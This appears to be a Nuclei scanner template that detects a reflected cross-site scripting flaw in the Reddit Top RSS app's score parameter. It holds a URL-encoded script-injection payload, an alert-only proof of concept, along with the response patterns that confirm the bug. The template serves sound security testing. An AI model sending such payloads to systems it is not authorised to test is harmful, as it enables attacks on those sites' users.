id: reddittop-rss-xss

info:
  name: Reddit Top RSS - Cross-Site Scripting
  author: arafatansari
  severity: high
  description: |
    Reddit Top RSS contains a cross-site scripting vulnerability via the /?subreddit=news&score= parameter.
  reference:
    - https://github.com/johnwarne/reddit-top-rss/issues/12
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
  tags: reddit,rss,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?subreddit=news&score=2134%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="2134"><script>alert(document.domain)</script>" min="0"'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
